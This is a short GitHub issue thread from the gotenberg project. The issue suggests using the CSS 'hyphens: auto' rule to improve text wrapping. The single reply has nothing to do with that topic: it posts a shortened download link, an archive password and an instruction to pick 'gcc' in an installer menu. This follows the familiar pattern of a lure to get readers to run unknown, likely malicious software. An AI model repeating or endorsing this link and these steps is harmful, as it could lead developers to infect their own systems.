### ISSUE TITLE
Using hyphens: auto is a straightforward and effective way to manage text wrapping and improve readability without needing additional libraries.

### ISSUE THREAD

**Issue by shox404** [gotenberg/gotenberg#945]
Using hyphens: auto is a straightforward and effective way to manage text wrapping and improve readability without needing additional libraries.

_Originally posted by @shox404 in https://github.com/gotenberg/gotenberg/discussions/944#discussioncomment-10465352_

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
